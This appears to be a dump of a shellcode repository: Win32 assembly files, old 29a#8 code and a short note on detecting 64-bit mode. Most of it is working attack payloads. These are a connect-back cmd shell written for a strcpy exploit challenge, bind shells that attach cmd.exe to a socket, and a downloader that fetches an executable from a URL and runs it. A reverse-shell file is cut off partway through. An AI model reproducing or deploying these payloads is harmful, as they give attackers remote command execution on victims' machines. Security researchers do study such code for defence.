├── README.txt ├── damo_chall.asm ├── detection.txt ├── old ├── bind_overlap.asm ├── bind_pipes.asm ├── download_exec1.asm ├── readme.txt ├── rev_overlap.asm ├── rev_pipes.asm ├── sys_exec.asm ├── win_exec.asm └── xdll.asm ├── win32 ├── bind_overlap.asm ├── exec.asm └── rev_overlap.asm └── win64 └── exec.asm /README.txt: -------------------------------------------------------------------------------- 1 | shellcode 2 | ========= 3 | 4 | Win32 Shellcodes 5 | 6 | (this is a cloned workspace. Nothing from me here...) 7 | -------------------------------------------------------------------------------- /damo_chall.asm: -------------------------------------------------------------------------------- 1 | 2 | ; 3 | ; this was written for Damos challenge, 4 | ; to exploit strcpy() vulnerability 5 | ; not much here is re-usable.. 6 | ; 7 | ; Kevin Devine / 26th July 2008 8 | ; 9 | ; assemble with NASM : nasm -fbin dx.asm 10 | ; 11 | 12 | [bits 32] 13 | 14 | global @entry_point 15 | 16 | @entry_point: 17 | ;int3 18 | 19 | cdq 20 | mov esp, eax 21 | xor eax, eax 22 | mov dl, (@get_proc_address - @entry_point) 23 | lea ebp, [esp + edx] 24 | 25 | mov dl, (@code_end - @get_proc_address) 26 | mov esi, ebp 27 | add esi, edx 28 | 29 | mov dl, (@cmd_string - @get_proc_address) + 3 30 | mov edi, ebp 31 | add edi, edx 32 | stosb 33 | 34 | xor ecx, ecx 35 | mov cl, 74h 36 | sub esp, ecx 37 | mov edi, esp 38 | rep stosb 39 | 40 | push byte 1 41 | push byte 2 42 | call ebp 43 | xchg eax, ebx 44 | mov eax, ~ 00100007Fh ; need to change this to your ip address 45 | not eax 46 | push eax 47 | 48 | mov eax, ~ 0D2040002h ; change to your listening port 49 | not eax 50 | push eax 51 | mov eax, esp 52 | 53 | push byte 10h 54 | push eax 55 | push ebx 56 | call ebp 57 | 58 | add esp, byte 10h 59 | 60 | push ebx 61 | xchg eax, ebx 62 | lea ebx, [edi-54h] 63 | lea edi, [ebx+38h] 64 | 65 | inc dword [ebx+2Dh] 66 | cdq 67 | stosd 68 | stosd 69 | stosd 70 | push edi 71 | push ebx 72 | push edx 73 | push edx 74 | push edx 75 | push eax 76 | push edx 77 | push edx 78 | push esi 79 | lodsd 80 | push edx 81 | call ebp 82 | 83 | push -1 84 | push dword [edi] 85 | 86 | exit_code: 87 | call ebp 88 | jmp short exit_code 89 | 90 | @get_proc_address: 91 | lodsd 92 | pusha 93 | push byte 30h 94 | pop ecx 95 | mov eax, [fs:ecx] 96 | mov eax, [eax+0Ch] 97 | mov esi, [eax+1Ch] 98 | ;int3 99 | load_dll: 100 | lodsd 101 | xchg eax, ebx 102 | lodsd 103 | lodsd 104 | xchg eax, ebx 105 | push eax 106 | 107 | mov eax, [ebx+3Ch] 108 | mov eax, [eax+ebx+78h] 109 | lea esi, [eax+ebx+18h] 110 | lodsd 111 | xchg eax, ecx 112 | lodsd 113 | add eax, ebx 114 | push eax 115 | lodsd 116 | lea edi, [ebx+eax] 117 | lodsd 118 | lea ebp, [ebx+eax] 119 | 120 | load_api: 121 | mov esi, [edi+ecx*4-4] 122 | add esi, ebx 123 | xor eax, eax 124 | cdq 125 | 126 | hash_api: 127 | lodsb 128 | add edx, eax 129 | rol edx, 7 130 | xor edx, eax 131 | dec eax 132 | jns short hash_api 133 | 134 | cmp edx, [esp+24h] 135 | jz short call_api 136 | 137 | loop load_api 138 | 139 | pop eax 140 | pop esi 141 | jmp short load_dll 142 | call_api: 143 | pop eax 144 | movzx edx, word [ebp+ecx*2-2] 145 | add ebx, [eax+edx*4] 146 | pop esi 147 | mov [esp+1Ch], ebx 148 | popa 149 | jmp eax 150 | @code_end: 151 | dd 087C1A5B2h 152 | dd 0E49C80ECh 153 | @cmd_string: 154 | db 'cmd',0FFh 155 | dd 01772DFFEh 156 | dd 05338DA4Bh 157 | dd 0A2CDED6Eh 158 | dd 0DB93EB6Fh 159 | -------------------------------------------------------------------------------- /detection.txt: -------------------------------------------------------------------------------- 1 | Peter Ferrie posted some nice code to detect 64-bit mode [1] 2 | I later discovered it was inspired by Arkon [2] 3 | 4 | It got me thinking about other ways to do it. 5 | 6 | I'm using NASM which is what I suspect Peter uses too. 7 | It supports mixing 32 and 64 bit code which is very useful. 8 | 9 | Arkon's initial solution in 6 bytes was this: 10 | 11 | 12 | xor eax, eax 13 | db 40h 14 | nop 15 | jz is_64bit 16 | 17 | ; 32-bit code here 18 | is_64bit: 19 | ; ... 20 | 21 | 32-bit translation 22 | 23 | /* 00000000 */ "\0x31\0xC0" /* xor eax, eax 24 | /* 00000002 */ "\0x40" /* inc eax 25 | /* 00000003 */ "\0x90" /* nop 26 | /* 00000004 */ "\0x74\0x00" /* je 00000006h 27 | 28 | 64-bit translation 29 | 30 | /* 00000000 */ "\0x31\0xC0" /* xor eax, eax 31 | /* 00000002 */ "\0x40\0x90" /* nop 32 | /* 00000004 */ "\0x74\0x00" /* je 00000006h 33 | 34 | As Arkon explains, eax becomes 1 on 32-bit but remains zero 35 | on 64-bit and makes the jump. 36 | 37 | The following is Peter's code. 38 | 39 | bits 32 40 | xor ecx, ecx 41 | inc ecx 42 | loop is_64bit 43 | 44 | xor eax, eax 45 | 46 | is_64bit: 47 | bits 64 48 | xor rax, rax 49 | 50 | 32-bit 51 | 52 | /* 00000000 */ "\0x31\0xC9" /* xor ecx, ecx 53 | /* 00000002 */ "\0x41" /* inc ecx 54 | /* 00000003 */ "\0xE2\0x00" /* loop 00000005h 55 | 56 | 64-bit 57 | 58 | /* 00000000 */ "\0x31\0xC9" /* xor ecx, ecx 59 | /* 00000002 */ "\0x41\0xE2\0x00" /* loop 00000005h 60 | 61 | The 32-bit code will follow through with loop because ecx is 1. 62 | The 64-bit code will branch to the is_64bit because of REX prefix. 63 | 64 | There are alternatives if you get creative enough with valid 65 | REX prefixes which would appear as INC/DEC instructions of 66 | any valid 32-bit register. I use DEC EAX for examples here. 67 | 68 | Something similar in 5 bytes would be: 69 | 70 | 71 | bits 32 72 | xor eax, eax 73 | dec eax 74 | jns is_64bit 75 | 76 | xor eax, eax 77 | 78 | is_64bit: 79 | bits 64 80 | xor rax, rax 81 | 82 | 32-bit 83 | 84 | /* 00000000 */ "\0x31\0xC0" /* xor eax, eax 85 | /* 00000002 */ "\0x48" /* dec eax 86 | /* 00000003 */ "\0x79\0x02" /* jns 00000007h 87 | 88 | 64-bit 89 | 90 | /* 00000000 */ "\0x31\0xC0" /* xor eax, eax 91 | /* 00000002 */ "\0x48\0x79\0x02" /* jns 00000007h 92 | 93 | The 32-bit code follows through while on 64-bit it makes the jump. 94 | Another example using 6 bytes. 95 | 96 | bits 32 97 | xor eax, eax 98 | dec eax 99 | xchg eax, ecx 100 | jecxz is_64bit 101 | 102 | ;xor eax, eax 103 | 104 | is_64bit: 105 | bits 64 106 | ;xor rax, rax 107 | 108 | 109 | 32-bit 110 | 111 | /* 00000000 */ "\0x31\0xC0" /* xor eax, eax 112 | /* 00000002 */ "\0x48" /* dec eax 113 | /* 00000003 */ "\0x91" /* xchg eax, ecx 114 | /* 00000004 */ "\0xE3\0x02" /* jecxz 00000008h 115 | 116 | 64-bit 117 | 118 | /* 00000000 */ "\0x31\0xC0" /* xor eax, eax 119 | /* 00000002 */ "\0x48\0x91" /* xchg rax, rcx 120 | /* 00000004 */ "\0xE3\0x02" /* jrcxz 00000008h 121 | 122 | 123 | Another very similar to above but using jns instead of jecxz 124 | 125 | bits 32 126 | xor eax, eax 127 | dec eax 128 | xchg eax, ecx 129 | jns is_64bit 130 | ; execute 32-bit code 131 | is_64bit: 132 | bits 64 133 | ; execute 64-bit code 134 | 135 | 32-bit 136 | 137 | /* 00000000 */ "\0x31\0xC0" /* xor eax, eax 138 | /* 00000002 */ "\0x48" /* dec eax 139 | /* 00000003 */ "\0x91" /* xchg eax, ecx 140 | /* 00000004 */ "\0x79\0x00" /* jns 00000006h 141 | 142 | 64-bit 143 | 144 | /* 00000000 */ "\0x31\0xC0" /* xor eax, eax 145 | /* 00000002 */ "\0x48\0x91" /* xchg rax, rcx 146 | /* 00000004 */ "\0x79\0x00" /* jns 00000006h 147 | 148 | 149 | Here's one using CDQ / CQO in 9 bytes. 150 | 151 | bits 32 152 | or eax, -1 ; set 32-bits 153 | dec eax ; cdq becomes cqo on 64-bit 154 | cdq ; if edx is zero, we're 64-bits 155 | test edx, edx 156 | jz is_64bit 157 | 158 | xor eax, eax 159 | is_64bit: 160 | bits 64 161 | xor rax, rax 162 | 163 | 164 | 32-bit 165 | 166 | /* 00000000 */ "\0x83\0xC8\0xFF" /* or eax, FFFFFFFFh 167 | /* 00000003 */ "\0x48" /* dec eax 168 | /* 00000004 */ "\0x99" /* cdq 169 | /* 00000005 */ "\0x85\0xD2" /* test edx, edx 170 | /* 00000007 */ "\0x74\0x00" /* je 00000009h 171 | 172 | 64-bit 173 | 174 | /* 00000000 */ "\0x83\0xC8\0xFF" /* or eax, FFFFFFFFh 175 | /* 00000003 */ "\0x48\0x99" /* cqo 176 | /* 00000005 */ "\0x85\0xD2" /* test edx, edx 177 | /* 00000007 */ "\0x74\0x00" /* je 00000009h 178 | 179 | 180 | One from hh86 in 6 bytes 181 | 182 | /* 00000000 */ "\0x8C\0xE8" /* mov ax, gs 183 | /* 00000002 */ "\0x3C\0x33" /* cmp al, 33h 184 | /* 00000004 */ "\0x74\0x00" /* je 00000006h 185 | 186 | 187 | If you find any errors with these examples, don't hesitate to contact 188 | and correct me. 189 | 190 | BR 191 | Kevin ( @cmpxchg8 ) 192 | 193 | References: 194 | [1]: IS_X64() IN 5 BYTES (INCLUDING BRANCH) 195 | http://pferrie.host22.com/misc/isx64.htm 196 | 197 | [2]: isX64 Gem 198 | http://www.ragestorm.net/blogs/?p=376 199 | -------------------------------------------------------------------------------- /old/bind_overlap.asm: -------------------------------------------------------------------------------- 1 | comment ~ 2 | 3 | This creates and uses WSASocketA handle for hStdInput/hStdOutput in creation of cmd.exe process. 4 | It works, because the socket is created *without* overlapped attribute.. 5 | 6 | 260 bytes bind to localhost:31337 7 | 8 | still contains null bytes in places. 9 | 10 | In regards to using this within a GUI application, you will notice that 11 | this may not work..AllocConsole API must be added to existing code. 12 | 13 | MASM 14 | 15 | ml /DMASM /c /Cp /coff /IC:\MASM32\INCLUDE bind_overlap.asm 16 | link /SUBSYSTEM:CONSOLE /LIBPATH:C:\MASM32\LIB /SECTION:.text,W bind_overlap.obj 17 | 18 | 19 | TASM 20 | 21 | implib -c -f -o -i import32.lib %SYSTEMROOT%\system32\kernel32.dll %SYSTEMROOT%\system32\ws2_32.dll 22 | tasm32 /dTASM /ml /m9 bind_overlap.asm 23 | tlink32 /Tpe /ap /x bind_overlap.obj,,,import32.lib 24 | 25 | ~ 26 | .586 27 | .model flat,stdcall 28 | 29 | IFDEF MASM 30 | include 31 | include 32 | .data 33 | pad db 0 34 | .code 35 | ENDIF 36 | 37 | IFDEF TASM 38 | extrn ExitProcess :proc 39 | extrn WSAStartup :proc 40 | .code 41 | ret 42 | .data 43 | ENDIF 44 | 45 | hLoadLibraryA EQU ebp+04 46 | hCreateProcessA EQU ebp+08 47 | hWaitForSingleObject EQU ebp+12 48 | 49 | hWSASocketA EQU ebp+16 50 | hbind EQU ebp+20 51 | hlisten EQU ebp+24 52 | haccept EQU ebp+28 53 | 54 | HASH_CONSTANT EQU 7 55 | 56 | ; macro for generating 16-bit api hashes 57 | hashapi macro szApi 58 | local dwHash 59 | dwHash = 0 60 | 61 | forc x, 62 | dwHash = dwHash + "&x" 63 | dwHash = (dwHash shl HASH_CONSTANT) or (dwHash shr (32-HASH_CONSTANT)) 64 | endm 65 | dwHash = dwHash and 0ffffh 66 | dw dwHash 67 | endm 68 | 69 | assume fs:nothing 70 | main: 71 | mov eax, end_code-entry_point 72 | sub esp, 200h 73 | push esp 74 | push 02h 75 | call WSAStartup ; just here for testing. 76 | add esp, 200h 77 | ;--------------------- 78 | ;####################################################################### 79 | 80 | entry_point: 81 | add esp, -28 ; create 28 byte stack frame 82 | 83 | mov edi, esp ; edi + ebp will be pointers to api 84 | mov ebp, esp 85 | add ebp, -4 86 | ; get position in memory 87 | push 0c356565eh ; pop esi/push esi/push esi/ret 88 | mov eax, esp 89 | call eax 90 | mem_position: 91 | inc byte ptr [esi + (pws32End - mem_position)] ; nullify byte, end of ws2_32 arg 92 | lea esi, [esi + (hashed_api - mem_position)] 93 | jmp getk32base 94 | hashed_api: 95 | hashapi 96 | hashapi 97 | hashapi 98 | 99 | db "ws2_32",0ffh,0ffh 100 | pws32End equ $-2 101 | 102 | hashapi 103 | hashapi 104 | hashapi 105 | hashapi 106 | getk32base: 107 | push 30h 108 | pop ecx 109 | mov eax, fs:[ecx] 110 | mov eax, [eax + 0ch] 111 | mov ebx, [eax + 1ch] 112 | mov ebx, [ebx] 113 | mov ebx, [ebx + 08h] 114 | ;--------------------- 115 | mov cl, 03h ; get 3 api first from kernel32.dll 116 | get_apis: 117 | pushad 118 | movzx eax, word ptr [ebx + 3ch] 119 | mov esi, [eax + ebx + 78h] 120 | lea esi, [ebx + esi + 1ch] 121 | mov cl, 03h 122 | load_rva: 123 | lodsd 124 | add eax, ebx 125 | push eax 126 | loop load_rva 127 | pop ebp 128 | pop edi 129 | load_index: 130 | mov esi, [edi + 4 * ecx] 131 | add esi, ebx 132 | xor eax, eax 133 | cdq 134 | hash_export: 135 | lodsb 136 | add edx, eax 137 | rol edx, HASH_CONSTANT 138 | dec eax 139 | jns hash_export 140 | ror edx, HASH_CONSTANT 141 | inc ecx 142 | mov esi, [esp + 08] 143 | lodsd 144 | cmp ax, dx 145 | jne load_index 146 | ;----------------- 147 | dec ecx 148 | pop esi 149 | xchg eax, ebp 150 | movzx edx, word ptr [eax + 2 * ecx] 151 | add ebx, dword ptr [esi + 4 * edx] 152 | mov [esp + 28], ebx 153 | popad 154 | inc esi 155 | inc esi 156 | stosd 157 | loop get_apis 158 | 159 | push esi 160 | call dword ptr [hLoadLibraryA] 161 | xchg eax, ebx 162 | lodsd 163 | lodsd 164 | ;------------------------------ 165 | push 4 166 | pop ecx 167 | dec edx 168 | jnz get_apis 169 | 170 | push ebx 171 | push ebx 172 | push ebx ; 0 173 | push ebx 174 | push ebx 175 | push ebx 176 | push 1 177 | push 2 178 | call dword ptr [hWSASocketA] 179 | 180 | push ebx 181 | push ebx 182 | push 00100007fh ; 127.0.0.1 183 | push 0697a0002h ; 31337,AF_INET 184 | mov edx, esp 185 | 186 | push 16 ; sizeof sockaddr_in 187 | push edx ; *sockaddr_in 188 | xchg eax, ebx 189 | push ebx ; handle of socket 190 | call dword ptr [hbind] 191 | add esp, 4*4 192 | 193 | push 1 194 | push ebx 195 | call dword ptr [hlisten] 196 | 197 | push eax 198 | push eax 199 | push ebx 200 | call dword ptr [haccept] 201 | xchg eax, ebx 202 | 203 | push "dmc" ; cmd.exe / null byte at end 204 | mov edx, esp 205 | 206 | xor eax, eax 207 | push eax ; PROCESS_INFORMATION 208 | push eax 209 | push eax 210 | push eax 211 | mov esi, esp 212 | ;------------- ; STARTUPINFO 213 | push ebx ; hStdError / handle of socket 214 | push ebx ; hStdInput 215 | push ebx ; hStdOutput 216 | ;-------- 217 | push eax 218 | push eax 219 | push 101h ; dwFlags / null byte at end. 220 | ;--------- 221 | push 11 222 | pop ecx 223 | push_stinfo: 224 | push eax 225 | loop push_stinfo 226 | mov ecx, esp 227 | 228 | push esi ;offset lpProcessInformation 229 | push ecx 230 | push eax 231 | push eax 232 | push eax 233 | push 1 ;TRUE 234 | push eax 235 | push eax 236 | push edx ;offset szCmd 237 | push eax 238 | call dword ptr [hCreateProcessA] 239 | 240 | push -1 ; INFINITE 241 | lodsd 242 | push eax ; process handle 243 | call dword ptr [hWaitForSingleObject] 244 | end_code: 245 | push 0 246 | call ExitProcess ; here for test, and because Win2k/XP crash with no API imports in PE file. 247 | end main 248 | -------------------------------------------------------------------------------- /old/bind_pipes.asm: -------------------------------------------------------------------------------- 1 | comment ~ 2 | bind socket to localhost:31337 using PIPES as I/O to CMD.EXE 3 | 4 | Size -> about 371 bytes 5 | 6 | You can assemble with instructions below. 7 | Its a bit lame, but you must terminate this with CTRL-C 8 | 9 | I saw this idea first used by Dark Spyrit AKA Barnaby Jack 10 | 11 | TASM 12 | implib -c -i -o -f import32.lib %SYSTEMROOT%\System32\ws2_32.dll 13 | tasm32 /dTASM /ml bind_pipes.asm 14 | tlink32 /Tpe /ap /x bind_pipes,,,import32.lib 15 | 16 | MASM 17 | ml /DMASM /Cp /c /coff /I c:\masm32\include bind_pipes.asm 18 | link /SUBSYSTEM:CONSOLE /LIBPATH:c:\masm32\lib bind_pipes.obj 19 | 20 | ~ 21 | .586 22 | .model flat, stdcall 23 | 24 | IFDEF MASM 25 | include 26 | .data 27 | pad db 0 28 | .code 29 | ENDIF 30 | 31 | IFDEF TASM 32 | extrn WSAStartup :proc 33 | .code 34 | ret 35 | .data 36 | ENDIF 37 | 38 | HASH_CONSTANT EQU 7 39 | 40 | ; macro for generating 16-bit api hashes 41 | hashapi macro szApi 42 | local dwHash 43 | dwHash = 0 44 | 45 | forc x, 46 | dwHash = dwHash + "&x" 47 | dwHash = (dwHash shl HASH_CONSTANT) or (dwHash shr (32-HASH_CONSTANT)) 48 | endm 49 | dwHash = dwHash and 0ffffh 50 | dw dwHash 51 | endm 52 | 53 | assume fs:nothing 54 | main: 55 | mov eax, end_code-BindCmd 56 | 57 | sub esp, 200h 58 | push esp 59 | push 02h 60 | call WSAStartup 61 | add esp, 200h 62 | 63 | call BindCmd 64 | ;================================= all code below is independent of address 65 | 66 | szBuffer equ ebp+64 67 | 68 | pipe_out_pread equ ebp+60 69 | pipe_out_pwrite equ ebp+56 70 | pipe_in_pread equ ebp+52 71 | pipe_in_pwrite equ ebp+48 72 | pipes equ ebp+48 73 | 74 | hLoadLibraryA equ ebp-128 75 | hCreatePipe equ ebp-124 76 | hCreateProcess equ ebp-120 77 | hPeekNamedPipe equ ebp-116 78 | hReadFile equ ebp-112 79 | hWriteFile equ ebp-108 80 | hSleep equ ebp-104 81 | 82 | hsocket equ ebp-100 83 | hlisten equ ebp-96 84 | hbind equ ebp-92 85 | haccept equ ebp-88 86 | hsend equ ebp-84 87 | hioctlsocket equ ebp-80 88 | hrecv equ ebp-76 89 | 90 | hsock equ ebp-52 91 | dwBytesRead equ ebp-48 92 | pinfo equ ebp-44 93 | 94 | BindCmd: 95 | enter 256, 00h 96 | mov edi, ebp 97 | add ebp, 127 98 | inc ebp 99 | 100 | mov eax, fs:[30h] 101 | mov eax, [eax + 0ch] 102 | mov esi, [eax + 1ch] 103 | lodsd 104 | mov ebx, [eax + 08h] 105 | 106 | call load_api_hashes 107 | 108 | hashapi 109 | hashapi 110 | hashapi 111 | hashapi 112 | hashapi 113 | hashapi 114 | hashapi 115 | 116 | db "ws2_32",00h 117 | 118 | hashapi 119 | hashapi 120 | hashapi 121 | hashapi 122 | hashapi 123 | hashapi 124 | hashapi 125 | 126 | load_api_hashes: 127 | push 07h ; retrieve 7 first. 128 | pop ecx 129 | get_apis_loop: 130 | pushad 131 | mov ebp, [esp + 20h] 132 | movzx eax, word ptr [ebx + 3ch] 133 | mov esi, [eax + ebx + 78h] 134 | lea esi, [ebx + esi + 1ch] 135 | lodsd 136 | add eax, ebx 137 | push eax 138 | lodsd 139 | lea edi, [eax + ebx] 140 | lodsd 141 | add eax, ebx 142 | push eax 143 | xor ecx, ecx 144 | load_index: 145 | mov esi, [edi + 4 * ecx] 146 | add esi, ebx 147 | xor eax, eax 148 | cdq 149 | hash_export: 150 | lodsb 151 | add edx, eax 152 | rol edx, HASH_CONSTANT 153 | dec eax 154 | jns hash_export 155 | ror edx, HASH_CONSTANT 156 | inc ecx 157 | cmp dx, word ptr [ebp] 158 | jne load_index 159 | dec ecx 160 | pop eax 161 | pop esi 162 | movzx eax, word ptr [eax + 2 * ecx] 163 | add ebx, dword ptr [esi + 4 * eax] 164 | mov [esp + 1ch], ebx 165 | popad 166 | add dword ptr [esp], 02h 167 | stosd 168 | loop get_apis_loop 169 | 170 | push dword ptr [esp] 171 | call dword ptr [hLoadLibraryA] 172 | add dword ptr [esp], 07h 173 | dec edx 174 | xchg eax, ebx 175 | jnz load_api_hashes 176 | pop eax 177 | 178 | push ebx 179 | push 01h ; SOCK_STREAM 180 | push 02h ; AF_INET 181 | call dword ptr [hsocket] 182 | xchg eax, esi 183 | 184 | push ebx ; sockaddr_in structure 185 | push ebx 186 | push 00100007fh ; 127.0.0.1 187 | push 0697a0002h ; 31337,AF_INET 188 | mov eax, esp 189 | 190 | push 10h ; sizeof(sockaddr_in) 191 | push eax ; *sockaddr_in 192 | push esi ; hsocket 193 | call dword ptr [hbind] 194 | add esp, 10h 195 | 196 | push 1 ; accept 1 connect 197 | push esi 198 | call dword ptr [hlisten] 199 | 200 | push ebx 201 | push ebx 202 | push esi 203 | call dword ptr [haccept] 204 | mov [hsock], eax 205 | 206 | push 01h ; bInheritHandle=TRUE 207 | push ebx ; SECURITY_DESCRIPTOR=NULL 208 | push 0ch ; sizeof(SECURITY_ATTRIBUTES) 209 | mov edi, esp 210 | 211 | lea esi, [pipes] 212 | push esi 213 | clc 214 | create_pipes: 215 | pushfd 216 | push ebx 217 | push edi 218 | push esi 219 | lodsd 220 | push esi 221 | lodsd 222 | call dword ptr [hCreatePipe] 223 | popfd 224 | cmc 225 | jc create_pipes 226 | pop ecx 227 | add esp, 0ch 228 | 229 | push "dmc" ; cmd.exe 230 | mov edx, esp 231 | 232 | push dword ptr[ecx] 233 | push dword ptr[ecx] 234 | push dword ptr [pipe_out_pread] 235 | push ebx 236 | push ebx 237 | 238 | inc ah 239 | push eax 240 | push 11 241 | pop ecx 242 | push_stinfo: 243 | push ebx 244 | loop push_stinfo 245 | mov eax, esp 246 | 247 | lea ecx, [pinfo] 248 | push ecx 249 | 250 | push eax 251 | push ebx 252 | push ebx 253 | push ebx 254 | push 01h 255 | push ebx 256 | push ebx 257 | push edx 258 | push ebx 259 | call dword ptr [hCreateProcess] 260 | add esp, 48h 261 | cmd_loop: 262 | push ebx 263 | push ebx 264 | lea esi, [dwBytesRead] 265 | push esi 266 | push 64 267 | lea edi, [szBuffer] 268 | push edi 269 | push dword ptr[pipe_in_pread] 270 | call dword ptr [hPeekNamedPipe] 271 | 272 | mov ecx, [esi] ; check for any data from cmd.exe 273 | jecxz cmd_get_user_input 274 | 275 | push ebx 276 | push ecx 277 | push edi 278 | push dword ptr [hsock] 279 | ;---------------------- 280 | push ebx 281 | push esi 282 | push ecx 283 | push edi 284 | push dword ptr[pipe_in_pread] 285 | call dword ptr [hReadFile] 286 | ;----------------------------- 287 | call dword ptr [hsend] 288 | cmd_get_user_input: 289 | push esi ; variable for data size 290 | push 4004667Fh ; FIONREAD 291 | push dword ptr[hsock] 292 | call dword ptr [hioctlsocket] 293 | 294 | mov ecx, [esi] 295 | jecxz cmd_sleep 296 | 297 | push ebx ; 0 298 | push esi ; variable for data written 299 | push ecx ; length of data 300 | push edi ; address of data 301 | push dword ptr[pipe_out_pwrite] 302 | ;------------------------------- 303 | push ebx 304 | push ecx ; length 305 | push edi ; buffer 306 | push dword ptr[hsock] 307 | call dword ptr [hrecv] 308 | ;------------------------------- 309 | call dword ptr [hWriteFile] 310 | cmd_sleep: 311 | push 10 312 | call dword ptr [hSleep] ; sleep for while, to avoid thrashing 313 | jmp cmd_loop 314 | end_code: 315 | 316 | end main 317 | -------------------------------------------------------------------------------- /old/download_exec1.asm: -------------------------------------------------------------------------------- 1 | comment ~ 2 | 3 | Downloads and executes a file from a web server. 4 | 5 | Uses LoadLibraryA, URLDownloadToFileA moniker & WinExec 6 | 7 | Variable code size, depending on URL and filename. 8 | Currently at 213 bytes. 9 | Target operating system is Win2k/XP. 10 | 11 | TASM 12 | implib -c -f -o -i kernel32.lib %SYSTEMROOT%\system32\kernel32.dll 13 | 14 | tasm32 /dTASM /ml /m9 download_exec1.asm 15 | tlink32 /Tpe /ap /x download_exec1.obj,,,kernel32.lib 16 | 17 | MASM 18 | ml /DMASM /c /coff /Cp /IC:\MASM32\INCLUDE download_exec1.asm 19 | link /SUBSYSTEM:WINDOWS /LIBPATH:C:\MASM32\LIB /SECTION:.text,W download_exec1.obj 20 | 21 | ~ 22 | 23 | .586 24 | .model flat, stdcall 25 | 26 | IFDEF MASM 27 | include 28 | include 29 | .data 30 | pad db 0 31 | .code 32 | ENDIF 33 | 34 | IFDEF TASM 35 | extrn ExitProcess :proc 36 | .code 37 | ret 38 | .data 39 | ENDIF 40 | 41 | HASH_CONSTANT EQU 9 42 | 43 | ; macro for generating 16-bit api hashes 44 | hashapi macro szApi 45 | local dwHash 46 | dwHash = 0 47 | 48 | forc x, 49 | dwHash = dwHash + "&x" 50 | dwHash = (dwHash shl HASH_CONSTANT) or (dwHash shr (32-HASH_CONSTANT)) 51 | endm 52 | dwHash = dwHash and 0ffffh 53 | dw dwHash 54 | endm 55 | 56 | assume fs:nothing 57 | 58 | main: 59 | mov eax, code_end-entrypoint 60 | ;==================================== 61 | hLoadLibraryA equ ebp+04h 62 | hWinExec equ ebp+08h 63 | hURLDownloadToFileA equ ebp+0ch 64 | ;==================================== 65 | entrypoint: 66 | add esp, -12 67 | mov ebp, esp 68 | lea edi, [ebp + 4] 69 | 70 | push 0c356565eh ; pop esi/push esi/push esi/ret 71 | mov eax, esp 72 | call eax 73 | mem_position: 74 | inc byte ptr [esi + (purlmonend - mem_position)] 75 | inc byte ptr [esi + (purlend - mem_position)] 76 | inc byte ptr [esi + (pfileend - mem_position)] 77 | 78 | lea esi, [esi + (phashes - mem_position)] 79 | jmp getk32_base 80 | phashes: 81 | hashapi 82 | hashapi 83 | 84 | db "URLMON",0ffh,0ffh 85 | purlmonend equ $-2 86 | hashapi 87 | ;############################################ 88 | szURL: 89 | db "http://localhost/file.exe", 0ffh ; download file from.. 90 | purlend equ $-1 91 | URL_Length equ $-szURL 92 | db "k0walski.exe", 0ffh ; save filename as.. 93 | pfileend equ $-1 94 | ;############################################ 95 | getk32_base: 96 | push 30h 97 | pop ecx 98 | mov eax, fs:[ecx] 99 | mov eax, [eax + 0ch] 100 | mov ebx, [eax + 1ch] 101 | mov ebx, [ebx] 102 | mov ebx, [ebx + 08h] 103 | 104 | mov cl, 2 ; get 2 api from kernel32.dll first 105 | get_apis_loop: 106 | pushad 107 | movzx eax, word ptr[ebx + 3ch] 108 | mov esi, [eax + ebx + 78h] 109 | lea esi, [ebx + esi + 1ch] 110 | lodsd 111 | add eax, ebx 112 | push eax 113 | lodsd 114 | lea edi, [eax + ebx] 115 | lodsd 116 | add eax, ebx 117 | push eax 118 | xor ecx, ecx 119 | load_index: 120 | mov esi, [edi + 4 * ecx] 121 | add esi, ebx 122 | xor eax, eax 123 | cdq 124 | hash_export: 125 | lodsb 126 | add edx, eax 127 | rol edx, HASH_CONSTANT 128 | dec eax 129 | jns hash_export 130 | ror edx, HASH_CONSTANT 131 | inc ecx 132 | mov esi, dword ptr [esp + 4 + 8] 133 | cmp dx, word ptr [esi] 134 | jne load_index 135 | dec ecx 136 | pop eax 137 | pop esi 138 | movzx eax, word ptr[eax + 2 * ecx] 139 | add ebx, dword ptr[esi + 4 * eax] 140 | mov [esp + 1ch], ebx 141 | popad 142 | inc esi 143 | inc esi 144 | stosd 145 | loop get_apis_loop 146 | 147 | push esi 148 | call dword ptr[hLoadLibraryA] 149 | xchg eax, ebx 150 | lodsd 151 | lodsd ; skip URLMON,0xff,0xff 152 | push 01h ; get 1 api 153 | pop ecx 154 | dec edx 155 | jnz get_apis_loop 156 | 157 | std 158 | lodsd 159 | lodsd 160 | cld 161 | 162 | lea edi, [URL_Length + esi] 163 | 164 | push ebx 165 | push ebx 166 | push edi 167 | push esi 168 | push ebx 169 | call dword ptr[hURLDownloadToFileA] 170 | 171 | push eax 172 | push edi 173 | call dword ptr [hWinExec] 174 | code_end: 175 | exit: 176 | push eax 177 | call ExitProcess 178 | end main 179 | -------------------------------------------------------------------------------- /old/readme.txt: -------------------------------------------------------------------------------- 1 | 2004 codes that appeared in 29a#8 2 | -------------------------------------------------------------------------------- /old/rev_overlap.asm: -------------------------------------------------------------------------------- 1 | comment ~ 2 | 3 | reverse connect to localhost port 31337 using WSASocketA handle for 4 | input/output to cmd.exe process. 5 | 6 | It works, because the socket is created *without* overlapped attribute.. 7 | 8 | size -> 241 bytes 9 | 10 | Works really well..but this hasn't been finished as well as it could have been. 11 | I remember also reading about the effectiveness of using this code within 12 | a GUI application..it won't work. 13 | 14 | You have to first create a console using AllocConsole API, but its not 15 | included in this. 16 | 17 | This should be null-byte free, apart from the ip address. 18 | 19 | MASM 20 | 21 | ml /DMASM /c /Cp /coff /IC:\MASM32\INCLUDE rev_overlap.asm 22 | link /SUBSYSTEM:CONSOLE /LIBPATH:C:\MASM32\LIB /SECTION:.text,W rev_overlap.obj 23 | 24 | 25 | TASM 26 | 27 | implib -c -f -o -i import32.lib %SYSTEMROOT%\system32\kernel32.dll %SYSTEMROOT%\system32\ws2_32.dll 28 | tasm32 /dTASM /ml /m9 rev_overlap.asm 29 | tlink32 /Tpe /ap /x rev_overlap.obj,,,import32.lib 30 | 31 | ~ 32 | .586 33 | .model flat,stdcall 34 | 35 | IFDEF MASM 36 | include 37 | include 38 | .data 39 | pad db 0 40 | .code 41 | ENDIF 42 | 43 | IFDEF TASM 44 | extrn ExitProcess :proc 45 | extrn WSAStartup :proc 46 | .code 47 | ret 48 | .data 49 | ENDIF 50 | 51 | HOST_ADDRESS textequ <00100007fh> ; localhost ip address 52 | 53 | hLoadLibraryA EQU ebp+04 54 | hCreateProcessA EQU ebp+08 55 | hWaitForSingleObject EQU ebp+12 56 | 57 | hWSASocketA EQU ebp+16 58 